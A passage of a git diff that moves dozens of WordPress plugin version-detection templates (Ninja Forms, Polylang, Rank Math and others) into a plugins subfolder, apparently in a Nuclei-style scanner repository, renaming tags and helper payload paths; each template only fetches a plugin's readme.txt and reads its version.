technologies/wordpress/plugins/nextgen-gallery.yaml index 7770511372..695b181704 100644 --- a/technologies/wordpress/wordpress-nextgen-gallery.yaml +++ b/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -1,7 +1,7 @@ id: wordpress-nextgen-gallery info: - name: "WordPress Gallery Plugin – NextGEN Gallery Detection" + name: WordPress Gallery Plugin – NextGEN Gallery Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/nextgen-gallery/readme.txt" payloads: - last_version: wordpress-nextgen-gallery.txt + last_version: helpers/wordpress/plugins/nextgen-gallery.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-ninja-forms.yaml b/technologies/wordpress/plugins/ninja-forms.yaml similarity index 83% rename from technologies/wordpress/wordpress-ninja-forms.yaml rename to technologies/wordpress/plugins/ninja-forms.yaml index 1cf3168ebc..27a2ddad7c 100644 --- a/technologies/wordpress/wordpress-ninja-forms.yaml +++ b/technologies/wordpress/plugins/ninja-forms.yaml @@ -1,7 +1,7 @@ id: wordpress-ninja-forms info: - name: "Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress Detection" + name: Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ninja-forms/readme.txt" payloads: - last_version: wordpress-ninja-forms.txt + last_version: helpers/wordpress/plugins/ninja-forms.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-ocean-extra.yaml b/technologies/wordpress/plugins/ocean-extra.yaml similarity index 87% rename from technologies/wordpress/wordpress-ocean-extra.yaml rename to technologies/wordpress/plugins/ocean-extra.yaml index 62ba4726ec..1f3a253890 100644 --- a/technologies/wordpress/wordpress-ocean-extra.yaml +++ b/technologies/wordpress/plugins/ocean-extra.yaml @@ -1,7 +1,7 @@ id: wordpress-ocean-extra info: - name: "Ocean Extra Detection" + name: Ocean Extra Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/ocean-extra/readme.txt" payloads: - last_version: wordpress-ocean-extra.txt + last_version: helpers/wordpress/plugins/ocean-extra.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-official-facebook-pixel.yaml b/technologies/wordpress/plugins/official-facebook-pixel.yaml similarity index 87% rename from technologies/wordpress/wordpress-official-facebook-pixel.yaml rename to technologies/wordpress/plugins/official-facebook-pixel.yaml index 6ecacefd30..6e55aeb01c 100644 --- a/technologies/wordpress/wordpress-official-facebook-pixel.yaml +++ b/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -1,7 +1,7 @@ id: wordpress-official-facebook-pixel info: - name: "Meta pixel for WordPress Detection" + name: Meta pixel for WordPress Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/official-facebook-pixel/readme.txt" payloads: - last_version: wordpress-official-facebook-pixel.txt + last_version: helpers/wordpress/plugins/official-facebook-pixel.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-one-click-demo-import.yaml b/technologies/wordpress/plugins/one-click-demo-import.yaml similarity index 86% rename from technologies/wordpress/wordpress-one-click-demo-import.yaml rename to technologies/wordpress/plugins/one-click-demo-import.yaml index 730dd664e2..076f7a48dc 100644 --- a/technologies/wordpress/wordpress-one-click-demo-import.yaml +++ b/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -1,7 +1,7 @@ id: wordpress-one-click-demo-import info: - name: "One Click Demo Import Detection" + name: One Click Demo Import Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/one-click-demo-import/readme.txt" payloads: - last_version: wordpress-one-click-demo-import.txt + last_version: helpers/wordpress/plugins/one-click-demo-import.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-optinmonster.yaml b/technologies/wordpress/plugins/optinmonster.yaml similarity index 81% rename from technologies/wordpress/wordpress-optinmonster.yaml rename to technologies/wordpress/plugins/optinmonster.yaml index 9022e2f04d..8b536d1443 100644 --- a/technologies/wordpress/wordpress-optinmonster.yaml +++ b/technologies/wordpress/plugins/optinmonster.yaml @@ -1,7 +1,7 @@ id: wordpress-optinmonster info: - name: "Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation Detection" + name: Popup Builder by OptinMonster – WordPress Popups for Optins, Email Newsletters and Lead Generation Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/optinmonster/readme.txt" payloads: - last_version: wordpress-optinmonster.txt + last_version: helpers/wordpress/plugins/optinmonster.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-password-protected.yaml b/technologies/wordpress/plugins/password-protected.yaml similarity index 87% rename from technologies/wordpress/wordpress-password-protected.yaml rename to technologies/wordpress/plugins/password-protected.yaml index 97cd35b56e..6dbb3913d6 100644 --- a/technologies/wordpress/wordpress-password-protected.yaml +++ b/technologies/wordpress/plugins/password-protected.yaml @@ -1,7 +1,7 @@ id: wordpress-password-protected info: - name: "Password Protected Detection" + name: Password Protected Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/password-protected/readme.txt" payloads: - last_version: wordpress-password-protected.txt + last_version: helpers/wordpress/plugins/password-protected.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-pdf-embedder.yaml b/technologies/wordpress/plugins/pdf-embedder.yaml similarity index 88% rename from technologies/wordpress/wordpress-pdf-embedder.yaml rename to technologies/wordpress/plugins/pdf-embedder.yaml index 8829499d83..4c12c57b33 100644 --- a/technologies/wordpress/wordpress-pdf-embedder.yaml +++ b/technologies/wordpress/plugins/pdf-embedder.yaml @@ -1,7 +1,7 @@ id: wordpress-pdf-embedder info: - name: "PDF Embedder Detection" + name: PDF Embedder Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/pdf-embedder/readme.txt" payloads: - last_version: wordpress-pdf-embedder.txt + last_version: helpers/wordpress/plugins/pdf-embedder.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-photo-gallery.yaml b/technologies/wordpress/plugins/photo-gallery.yaml similarity index 84% rename from technologies/wordpress/wordpress-photo-gallery.yaml rename to technologies/wordpress/plugins/photo-gallery.yaml index 34bec93cf2..1ffb84ef2d 100644 --- a/technologies/wordpress/wordpress-photo-gallery.yaml +++ b/technologies/wordpress/plugins/photo-gallery.yaml @@ -1,7 +1,7 @@ id: wordpress-photo-gallery info: - name: "Photo Gallery by 10Web – Mobile-Friendly Image Gallery Detection" + name: Photo Gallery by 10Web – Mobile-Friendly Image Gallery Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: photo-gallery wpscan: https://wpscan.com/plugin/photo-gallery - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/photo-gallery/readme.txt" payloads: - last_version: wordpress-photo-gallery.txt + last_version: helpers/wordpress/plugins/photo-gallery.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-php-compatibility-checker.yaml b/technologies/wordpress/plugins/php-compatibility-checker.yaml similarity index 87% rename from technologies/wordpress/wordpress-php-compatibility-checker.yaml rename to technologies/wordpress/plugins/php-compatibility-checker.yaml index 30abf1b78b..e22c5b6958 100644 --- a/technologies/wordpress/wordpress-php-compatibility-checker.yaml +++ b/technologies/wordpress/plugins/php-compatibility-checker.yaml @@ -1,7 +1,7 @@ id: wordpress-php-compatibility-checker info: - name: "PHP Compatibility Checker Detection" + name: PHP Compatibility Checker Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: php-compatibility-checker wpscan: https://wpscan.com/plugin/php-compatibility-checker - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/php-compatibility-checker/readme.txt" payloads: - last_version: wordpress-php-compatibility-checker.txt + last_version: helpers/wordpress/plugins/php-compatibility-checker.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-pixelyoursite.yaml b/technologies/wordpress/plugins/pixelyoursite.yaml similarity index 85% rename from technologies/wordpress/wordpress-pixelyoursite.yaml rename to technologies/wordpress/plugins/pixelyoursite.yaml index bab37421aa..dc7003bab8 100644 --- a/technologies/wordpress/wordpress-pixelyoursite.yaml +++ b/technologies/wordpress/plugins/pixelyoursite.yaml @@ -1,7 +1,7 @@ id: wordpress-pixelyoursite info: - name: "PixelYourSite – Your smart PIXEL (TAG) Manager Detection" + name: PixelYourSite – Your smart PIXEL (TAG) Manager Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt" payloads: - last_version: wordpress-pixelyoursite.txt + last_version: helpers/wordpress/plugins/pixelyoursite.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-polylang.yaml b/technologies/wordpress/plugins/polylang.yaml similarity index 88% rename from technologies/wordpress/wordpress-polylang.yaml rename to technologies/wordpress/plugins/polylang.yaml index ecebfda87f..52841781f1 100644 --- a/technologies/wordpress/wordpress-polylang.yaml +++ b/technologies/wordpress/plugins/polylang.yaml @@ -1,7 +1,7 @@ id: wordpress-polylang info: - name: "Polylang Detection" + name: Polylang Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/polylang/readme.txt" payloads: - last_version: wordpress-polylang.txt + last_version: helpers/wordpress/plugins/polylang.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-popup-builder.yaml b/technologies/wordpress/plugins/popup-builder.yaml similarity index 83% rename from technologies/wordpress/wordpress-popup-builder.yaml rename to technologies/wordpress/plugins/popup-builder.yaml index 20c87dd3f1..aeb73e0ee5 100644 --- a/technologies/wordpress/wordpress-popup-builder.yaml +++ b/technologies/wordpress/plugins/popup-builder.yaml @@ -1,7 +1,7 @@ id: wordpress-popup-builder info: - name: "Popup Builder – Create highly converting, mobile friendly marketing popups. Detection" + name: Popup Builder – Create highly converting, mobile friendly marketing popups. Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/popup-builder/readme.txt" payloads: - last_version: wordpress-popup-builder.txt + last_version: helpers/wordpress/plugins/popup-builder.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-popup-maker.yaml b/technologies/wordpress/plugins/popup-maker.yaml similarity index 84% rename from technologies/wordpress/wordpress-popup-maker.yaml rename to technologies/wordpress/plugins/popup-maker.yaml index e8072e7799..903807744a 100644 --- a/technologies/wordpress/wordpress-popup-maker.yaml +++ b/technologies/wordpress/plugins/popup-maker.yaml @@ -1,7 +1,7 @@ id: wordpress-popup-maker info: - name: "Popup Maker – Popup for opt-ins, lead gen, & more Detection" + name: Popup Maker – Popup for opt-ins, lead gen, & more Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/popup-maker/readme.txt" payloads: - last_version: wordpress-popup-maker.txt + last_version: helpers/wordpress/plugins/popup-maker.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-post-smtp.yaml b/technologies/wordpress/plugins/post-smtp.yaml similarity index 85% rename from technologies/wordpress/wordpress-post-smtp.yaml rename to technologies/wordpress/plugins/post-smtp.yaml index 53cd9592ff..ce01abb6aa 100644 --- a/technologies/wordpress/wordpress-post-smtp.yaml +++ b/technologies/wordpress/plugins/post-smtp.yaml @@ -1,7 +1,7 @@ id: wordpress-post-smtp info: - name: "Post SMTP Mailer/Email Log – Best Mail SMTP For WP Detection" + name: Post SMTP Mailer/Email Log – Best Mail SMTP For WP Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/post-smtp/readme.txt" payloads: - last_version: wordpress-post-smtp.txt + last_version: helpers/wordpress/plugins/post-smtp.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-post-types-order.yaml b/technologies/wordpress/plugins/post-types-order.yaml similarity index 87% rename from technologies/wordpress/wordpress-post-types-order.yaml rename to technologies/wordpress/plugins/post-types-order.yaml index b36043e265..cfd44a4669 100644 --- a/technologies/wordpress/wordpress-post-types-order.yaml +++ b/technologies/wordpress/plugins/post-types-order.yaml @@ -1,7 +1,7 @@ id: wordpress-post-types-order info: - name: "Post Types Order Detection" + name: Post Types Order Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/post-types-order/readme.txt" payloads: - last_version: wordpress-post-types-order.txt + last_version: helpers/wordpress/plugins/post-types-order.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml b/technologies/wordpress/plugins/premium-addons-for-elementor.yaml similarity index 80% rename from technologies/wordpress/wordpress-premium-addons-for-elementor.yaml rename to technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d38e84ea68..7861f9fce4 100644 --- a/technologies/wordpress/wordpress-premium-addons-for-elementor.yaml +++ b/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -1,7 +1,7 @@ id: wordpress-premium-addons-for-elementor info: - name: "Premium Addons for Elementor (Blog Post Listing, Mega Menu Builder, WooCommerce Products Grid, Carousel, Free Templates) Detection" + name: Premium Addons for Elementor (Blog Post Listing, Mega Menu Builder, WooCommerce Products Grid, Carousel, Free Templates) Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/premium-addons-for-elementor/readme.txt" payloads: - last_version: wordpress-premium-addons-for-elementor.txt + last_version: helpers/wordpress/plugins/premium-addons-for-elementor.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-pretty-link.yaml b/technologies/wordpress/plugins/pretty-link.yaml similarity index 83% rename from technologies/wordpress/wordpress-pretty-link.yaml rename to technologies/wordpress/plugins/pretty-link.yaml index d2069f1cfd..79601fec89 100644 --- a/technologies/wordpress/wordpress-pretty-link.yaml +++ b/technologies/wordpress/plugins/pretty-link.yaml @@ -1,7 +1,7 @@ id: wordpress-pretty-link info: - name: "Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin Detection" + name: Pretty Links – Affiliate Links, Link Branding, Link Tracking & Marketing Plugin Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/pretty-link/readme.txt" payloads: - last_version: wordpress-pretty-link.txt + last_version: helpers/wordpress/plugins/pretty-link.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-really-simple-captcha.yaml b/technologies/wordpress/plugins/really-simple-captcha.yaml similarity index 87% rename from technologies/wordpress/wordpress-really-simple-captcha.yaml rename to technologies/wordpress/plugins/really-simple-captcha.yaml index 3889e59197..96d46b09ad 100644 --- a/technologies/wordpress/wordpress-really-simple-captcha.yaml +++ b/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -1,7 +1,7 @@ id: wordpress-really-simple-captcha info: - name: "Really Simple CAPTCHA Detection" + name: Really Simple CAPTCHA Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/really-simple-captcha/readme.txt" payloads: - last_version: wordpress-really-simple-captcha.txt + last_version: helpers/wordpress/plugins/really-simple-captcha.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-really-simple-ssl.yaml b/technologies/wordpress/plugins/really-simple-ssl.yaml similarity index 87% rename from technologies/wordpress/wordpress-really-simple-ssl.yaml rename to technologies/wordpress/plugins/really-simple-ssl.yaml index 9a0f1bc54b..085b2e4ec5 100644 --- a/technologies/wordpress/wordpress-really-simple-ssl.yaml +++ b/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -1,7 +1,7 @@ id: wordpress-really-simple-ssl info: - name: "Really Simple SSL Detection" + name: Really Simple SSL Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/really-simple-ssl/readme.txt" payloads: - last_version: wordpress-really-simple-ssl.txt + last_version: helpers/wordpress/plugins/really-simple-ssl.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-redirection.yaml b/technologies/wordpress/plugins/redirection.yaml similarity index 87% rename from technologies/wordpress/wordpress-redirection.yaml rename to technologies/wordpress/plugins/redirection.yaml index dac0b15e8f..ebbc742eb8 100644 --- a/technologies/wordpress/wordpress-redirection.yaml +++ b/technologies/wordpress/plugins/redirection.yaml @@ -1,7 +1,7 @@ id: wordpress-redirection info: - name: "Redirection Detection" + name: Redirection Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/redirection/readme.txt" payloads: - last_version: wordpress-redirection.txt + last_version: helpers/wordpress/plugins/redirection.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-redux-framework.yaml b/technologies/wordpress/plugins/redux-framework.yaml similarity index 84% rename from technologies/wordpress/wordpress-redux-framework.yaml rename to technologies/wordpress/plugins/redux-framework.yaml index 68dd789380..9ef1cbad9d 100644 --- a/technologies/wordpress/wordpress-redux-framework.yaml +++ b/technologies/wordpress/plugins/redux-framework.yaml @@ -1,7 +1,7 @@ id: wordpress-redux-framework info: - name: "Gutenberg Template and Pattern Library & Redux Framework Detection" + name: Gutenberg Template and Pattern Library & Redux Framework Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/redux-framework/readme.txt" payloads: - last_version: wordpress-redux-framework.txt + last_version: helpers/wordpress/plugins/redux-framework.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml b/technologies/wordpress/plugins/regenerate-thumbnails.yaml similarity index 86% rename from technologies/wordpress/wordpress-regenerate-thumbnails.yaml rename to technologies/wordpress/plugins/regenerate-thumbnails.yaml index 4eacb70003..5b010facea 100644 --- a/technologies/wordpress/wordpress-regenerate-thumbnails.yaml +++ b/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -1,7 +1,7 @@ id: wordpress-regenerate-thumbnails info: - name: "Regenerate Thumbnails Detection" + name: Regenerate Thumbnails Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/regenerate-thumbnails/readme.txt" payloads: - last_version: wordpress-regenerate-thumbnails.txt + last_version: helpers/wordpress/plugins/regenerate-thumbnails.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-safe-svg.yaml b/technologies/wordpress/plugins/safe-svg.yaml similarity index 88% rename from technologies/wordpress/wordpress-safe-svg.yaml rename to technologies/wordpress/plugins/safe-svg.yaml index 5793e4747d..280e1a60d5 100644 --- a/technologies/wordpress/wordpress-safe-svg.yaml +++ b/technologies/wordpress/plugins/safe-svg.yaml @@ -1,7 +1,7 @@ id: wordpress-safe-svg info: - name: "Safe SVG Detection" + name: Safe SVG Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/safe-svg/readme.txt" payloads: - last_version: wordpress-safe-svg.txt + last_version: helpers/wordpress/plugins/safe-svg.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-seo-by-rank-math.yaml b/technologies/wordpress/plugins/seo-by-rank-math.yaml similarity index 87% rename from technologies/wordpress/wordpress-seo-by-rank-math.yaml rename to technologies/wordpress/plugins/seo-by-rank-math.yaml index a3caf4b51c..bc5af38c1b 100644 --- a/technologies/wordpress/wordpress-seo-by-rank-math.yaml +++ b/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -1,7 +1,7 @@ id: wordpress-seo-by-rank-math info: - name: "Rank Math SEO Detection" + name: Rank Math SEO Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/seo-by-rank-math/readme.txt" payloads: - last_version: wordpress-seo-by-rank-math.txt + last_version: helpers/wordpress/plugins/seo-by-rank-math.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-sg-cachepress.yaml b/technologies/wordpress/plugins/sg-cachepress.yaml similarity index 87% rename from technologies/wordpress/wordpress-sg-cachepress.yaml rename to technologies/wordpress/plugins/sg-cachepress.yaml index b657e7b26d..cf4c131eae 100644 --- a/technologies/wordpress/wordpress-sg-cachepress.yaml +++ b/technologies/wordpress/plugins/sg-cachepress.yaml @@ -1,7 +1,7 @@ id: wordpress-sg-cachepress info: - name: "SiteGround Optimizer Detection" + name: SiteGround Optimizer Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/sg-cachepress/readme.txt" payloads: - last_version: wordpress-sg-cachepress.txt + last_version: helpers/wordpress/plugins/sg-cachepress.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-sg-security.yaml b/technologies/wordpress/plugins/sg-security.yaml similarity index 87% rename from technologies/wordpress/wordpress-sg-security.yaml rename to technologies/wordpress/plugins/sg-security.yaml index 4ae436ca78..3693da2f6b 100644 --- a/technologies/wordpress/wordpress-sg-security.yaml +++ b/technologies/wordpress/plugins/sg-security.yaml @@ -1,7 +1,7 @@ id: wordpress-sg-security info: - name: "SiteGround Security Detection" + name: SiteGround Security Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/sg-security/readme.txt" payloads: - last_version: wordpress-sg-security.txt + last_version: helpers/wordpress/plugins/sg-security.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml b/technologies/wordpress/plugins/shortcodes-ultimate.yaml similarity index 84% rename from technologies/wordpress/wordpress-shortcodes-ultimate.yaml rename to technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1030f3cf12..81fdabe2d1 100644 --- a/technologies/wordpress/wordpress-shortcodes-ultimate.yaml +++ b/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -1,7 +1,7 @@ id: wordpress-shortcodes-ultimate info: - name: "WordPress Shortcodes Plugin — Shortcodes Ultimate Detection" + name: WordPress Shortcodes Plugin — Shortcodes Ultimate Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate - tags: tech,wordpress,plugin,top-100,top-200 + tags: tech,wordpress,wp-plugin,top-100,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/shortcodes-ultimate/readme.txt" payloads: - last_version: wordpress-shortcodes-ultimate.txt + last_version: helpers/wordpress/plugins/shortcodes-ultimate.txt extractors: - type: regex diff --git a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml similarity index 86% rename from technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml rename to technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index abfbf0156e..83d1b22c9a 100644 --- a/technologies/wordpress/wordpress-shortpixel-image-optimiser.yaml +++ b/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -1,7 +1,7 @@ id: wordpress-shortpixel-image-optimiser info: - name: "ShortPixel Image Optimizer Detection" + name: ShortPixel Image Optimizer Detection author: ricardomaia severity: info reference: @@ -9,7 +9,7 @@ info: metadata: plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser - tags: tech,wordpress,plugin,top-200 + tags: tech,wordpress,wp-plugin,top-200 requests: - method: GET @@ -19,7 +19,7 @@ requests: - "{{BaseURL}}/wp-content/plugins/shortpixel-image-optimiser/readme.txt" payloads: - last_version: wordpress-shortpixel-image-optimiser.txt + last_version: 